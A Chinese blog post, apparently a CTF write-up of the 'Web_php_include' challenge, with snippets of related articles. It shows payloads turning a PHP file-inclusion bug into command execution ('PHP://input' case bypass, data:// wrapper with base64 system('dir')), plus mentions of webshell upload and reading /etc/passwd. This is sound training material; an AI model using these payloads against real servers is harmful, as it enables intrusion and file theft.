攻防世界web_php_include

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量271 收藏 1
点赞数 1
文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60905276/article/details/121284785
版权

看到题目分析一波什么意思,首先前面Get hello这个参数没用。

要get page这个参数,然后循环匹配php://,接着把“php://”转换为“ ”。

ps.strstr返回一个指针,指向string2在string1中首次出现的位置。也就是循环。

也就是说没办法用php://伪协议了。

有两种方法。

第一:大写绕过

因为我查到strstr()这个函数是区分大小写的,大写PHP://就可以绕过再用input输入要执行的命令就行了。

ps.php://input用于执行php代码

page=PHP://input

这个命令可以再url上直接输入,也可以在抓包后输入。

先查看文件目录

<?php system("ls");?>

当然dir也可以。

发现文件,再显示文件内容。

<?php system("cat fla4gisisish3r3.php");?>

第二种用data伪协议来做

常用的有以下

?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码
?file=data:text/plain,<?php phpinfo()?>

 

 后面加上<?php system("dir");?>的base64编码。

/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKTs/Pg==

接下来就是把换成<?php system("cat fla4gisisish3r3.php");?>的编码就行了。

留将一面与花
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3433
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界Web_php_include
qq_44111753的博客
11-16 196
WP 攻防世界 Web_php_include 题目 WP 很明显,这题目和文件包含漏洞有关,来分析代码吧 <?php show_source(__FILE__); echo $_GET['hello'];//将hello参数的值输出 $page=$_GET['page'];//get参数提交的page值赋给page while (strstr($page, "php://")) {//若"php://"在page中出现过 $page=str_replace("php://", "", $p
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1367
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1289
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
php一些函数
m0_54015794的博客
01-15 259
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5813
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
常见Web安全漏洞的实际案例和攻防技术
02-15
### 常见Web安全漏洞的实际案例和攻防技术 #### 一、SQL注入攻击与防范 **实际案例** 在Web开发中,SQL注入是一种常见的安全威胁,它允许攻击者通过向应用程序发送恶意SQL代码来操纵数据库。例如,考虑一个简单的...
PHP常见安全漏洞攻防研究.pdf
01-05
"PHP常见安全漏洞攻防研究" PHP 是一种广泛使用的服务器端脚本语言,拥有强大功能和灵活的语法,使得 Web 开发者能够快速开发包含动态页面的 Web 应用程序。然而,由于 PHP开发人员要求很低和开发人员的疏忽,...
web渗透测试技巧(下)
10-12
- **漏洞示例**:例如,在以下代码中,`$_GET['file']`可以直接被用户控制,如果开发者没有对其进行适当的验证,则攻击者可以通过修改URL中的`file`参数来读取服务器上的任何文件:`include($_GET['file']);...
Mang0-php文件包含漏洞.zip
03-12
PHP中,`include`、`require`、`include_once`和`require_once`等函数用于将其他文件的内容插入到当前脚本中。当这些函数的参数来自不受信任的源,如HTTP请求,就可能引发问题。 ### Mang0的案例分析 "Mang0-php...
攻防世界Web_PHP_Include
Mrs_H的博客
10-04 579
攻防世界Web_PHP_Include 这是一道来自攻防世界web高手进阶题的其中一道题,题目很水,但是身为小白的我也遭遇到了各种各样的问题。所以写一下这道题我所用的wp思路,还有对于其他思路的一些看法。 法一 首先,我们先拿到了这道题的在线场景,打开一看 再结合着题目的意思这是一道文件包含题同时他过滤掉了php://伪协议,我第一反应就是换一个伪协议,将php://换成data://text/plain; 于是构造一个payload:?page=data://text/plain,<?%20sy
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 461
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9804
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界-Web-Web_php_include
uh_eng的博客
08-05 336
0x01 打开题目,代码如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 构造payload简单验证一下是不是文件包含: ?hello=xxx&page=/etc/passwd 结果如下:
攻防世界Web_php_include
2202_75317918的博客
04-13 852
攻防世界Web_php_include
攻防世界---Web_php_include
2201_75556700的博客
04-14 551
6.构造下面url,读取fl4gisisish3r3.php内容。5构造下面url,读取该路径的文件。4.构造下面url,得到目录路径。在网页上显示文本。
攻防世界-Web_php_include
Fisher
05-07 742
攻防世界-Web_php_include 适合新手看,自己的学习记录 拿到题目,是一段代码分析代码: <?php show_source(__FILE__); //show_source(__FILE__)为高亮函数,使用show_source(__)会将整个文件都显示出来。 echo $_GET['hello']; //输出以get提交的hello函数后面的值* $page=$_GET...
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 462
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值